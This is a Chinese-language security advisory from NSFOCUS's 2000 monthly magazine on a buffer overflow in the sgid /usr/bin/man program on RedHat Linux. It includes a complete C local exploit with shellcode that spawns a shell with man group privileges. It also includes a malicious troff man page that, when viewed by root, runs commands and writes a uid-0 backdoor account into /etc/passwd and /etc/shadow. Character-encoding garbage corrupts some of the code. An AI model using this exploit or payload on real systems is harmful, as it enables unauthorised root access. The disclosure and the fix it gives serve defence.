首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第7期->最新漏洞
日期:2000-05-23
受影响的系统:牋
RedHat Linux 6.2
RedHat Linux 6.1
RedHat Linux 6.0
RedHat Linux 5.2
RedHat Linux 5.1
RedHat Linux 5.0
RedHat Linux 4.2
RedHat Linux 4.1
RedHat Linux 4.0
--------------------------------------------------------------------------------
描述:
在大多数的Linux发布中,/usr/bin/man被设置了sgid man位.设置这一位是为了在
/var/catman目录下创建预先格式化好的man手册页,以便提高访问速度。然而,man
程序多次使用sprintf函数将用户输入的数据储存到固定大小的缓冲区中。这导致用
户可以提供超长的数据来使缓冲区溢出,获得man gid权限,进一步甚至可能获得root
权限。
比如,通过设置MANOAGER变量为超过4000个'A'的字符串,将导致缓冲区溢出:
$ MANPAGER=`perl -e '{print "A"x4000}'` man ls
[...]
1200 setuid(500) = 0
1200 setgid(15) = 0
1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200
牋牋open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200
牋牋close(-1) = -1 EBADF (Bad file descriptor)
1200 write(2, "Error executing formatting or display command.\nSystem command (cd /usr/man ; (echo
1200 --- SIGSEGV (Naruszenie ochrony pami?ci) ---
1200 +++ killed by SIGSEGV +++
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
如果用户获得了man gid权限,他就可以对/var/catman目录或者是一些在/usr/man
目录下的文件进行读写。通常情况下,/usr/man下的文件"man"是不可写的,但是有
些程序可能允许用户组man写它们的man页。因此用户可能通过构造一个恶意的man页,
当root浏览这个程序的man页时,任意代码将被执行,从而恶意用户可能获得root权
限。
<* 来源:牋Michal Zalewski (lcamtuf@DIONE.IDS.PL)牋*>
--------------------------------------------------------------------------------
测试程序:
/*牋/usr/bin/man overflow local exploit for Linux.
*牋Tested in RedHat 6.1 (2.2.14),RedHat 6.0 (ALIGN=0)
*牋It will give you gid "man" privledges,now you can play
*牋with /var/catman.:-)
*牋牋牋牋牋牋牋牋牋牋牋燽y warning3 <warning3@hotmail.com>
*牋牋牋牋牋牋牋牋牋牋牋牋牋牋牋牋牋爃ttp://www.nsfocus.com
*牋牋牋牋牋牋牋牋牋牋牋牋牋牋牋牋牋牋牋牋牋牋牋牋y2k/2/28
*/
#include <stdlib.h>
#define牋燘UFSIZE牋牋牋?000
#define牋燨FFSET牋牋牋牋20000
#define牋燗LIGN牋牋牋牋?
#define牋燦OP牋牋牋牋牋?x90
unsigned long get_esp(void){
__asm__("movl %esp,%eax");
}
char shellcode[] =
牋"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
牋"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
牋"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main (int argc,char **argv)
{
char *buf;
int bufsize=BUFSIZE,offset=OFFSET,align=ALIGN;
int i=0,eggsize;
long address,*ptr;
if(argc>1) bufsize=atoi(argv[1]);
if(argc>2) offset=atoi(argv[2]);
if(argc>3) align=atoi(argv[3]);
if(!(buf=malloc(bufsize))){
牋爌rintf("Can not allocate enough memory!\n");
牋爀xit(1);
}
memset(buf,'A',bufsize);
address=get_esp()-offset;
printf("Using address: 0x%x\n",address);
ptr=(long *)(buf+align);
for(i=align;i<bufsize;i=i+4)
牋牋牋?(ptr++)=address;
memset(buf,NOP,bufsize/2);
memcpy(buf+bufsize/2-strlen(shellcode)/2,shellcode,strlen(shellcode));
*(buf+bufsize-1)='\0';
memcpy(buf,"MANPAGER=",9);
putenv(buf);
execl("/usr/bin/man","man","ls",NULL);
}
Pawel Wilk <siewca@dione.ids.pl>提供的恶意man页示例:
----------------------mkroot.9---------------------------
.\" Copyright (c) 1999 Pawe?Wilk <siewca@dione.ids.pl>
.\"
.\" This is free documentation; you can redistribute it and/or
.\" modify it under the terms of the GNU General Public License as
.\" published by the Free Software Foundation; either version 2 of
.\" the License, or (at your option) any later version.
.\"
.\" The GNU General Public License's references to "object code"
.\" and "executables" are to be interpreted as the output of any
.\" document formatting or typesetting system, including
.\" intermediate and printed output.
.\"
.\" This manual is distributed in the hope that it will be useful,
.\" but WITHOUT ANY WARRANTY; without even the implied warranty of
.\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.牋See the
.\" GNU General Public License for more details.
.\"
.\" You should have received a copy of the GNU General Public
.\" License along with this manual; if not, write to the Free
.\" Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139,
.\" USA.
.\"
.TH MKROOT 9 "07-22-1999" "manual page" "Linux Hacker's Manual"
.SH NAME
.!牋?br> .psobyk
mkroot \- make a root-shell
.SH SYNOPSIS
.BI "man mkroot"
.SH DISCLAIMER
This manual page contains some \fBtroff\fP macros which could break your system's
security. If you are looking at this page being logged as root then you should know
that right in this moment you have allready created new, privileged account
called "sower". The account is disabled by default because of security reasons.
Don't forget to remove it! ;->
This is for information only.... use it at your own risk.
.SH DESCRIPTION
Manual pages are usualy based on \fBtroff\fP (see
.BR troff (1)
) macros. The point is, that some of these macros can access files or
even invoke some shell commands. It's usable, but try to imaginate
that the \fBtroff\fP macros contained in manual pages may have root privileges
if the \fBtroff\fP command's caller is root. (!)
.br
.LP
The most dangerous macros are:
.TP
.BI ".pso" " command"
used to display output of some \fIcommand\fP
.TP
.BI ".write" " stream string"
used to put the \fIstring\fP into the given \fIstream\fP
.LP
.SH EXAMPLES
.BI "/root directory listing" "牋?pso ls -l /root"
.nf
.pso ls -l /root
.fi
.BI "creating new user called sower (passwd)" " "
.nf
牋牋.opena stream /etc/passwd
牋牋.write stream sower:*:0:0::/:/dev/null
.fi
.opena stream /etc/passwd
.write stream sower:!:0:0::/:/dev/null
.BI "little preview" "牋?pso tail /etc/passwd"
.nf
.pso tail /etc/passwd
.fi
.BI "playing with shadow" ""
.nf
牋牋.opena stream /etc/shadow
牋牋.write stream sower:*:10531:0:99999:7::10794:
.fi
.opena stream /etc/shadow
.write stream sower:*:10531:0:99999:7::10794:
.BI "fingering new user" "牋牋.pso finger sower"
.nf
.pso finger sower
.fi
.SH FILES
.I /etc/passwd
.I /etc/shadow
.SH SEE ALSO
.BR man (1),
.BR passwd (1),
.BR troff (1).
.SH AUTHOR
Pawel Wilk <siewca@dione.ids.pl>
--------------------------------------------------------------------------------
建议:
牋牋删除/usr/bin/man的sgid位, chmod g-s /usr/bin/man .(注意这样它就不能在/var/catman
中创建预格式化好的man页了)
版权所有,未经许可,不得转载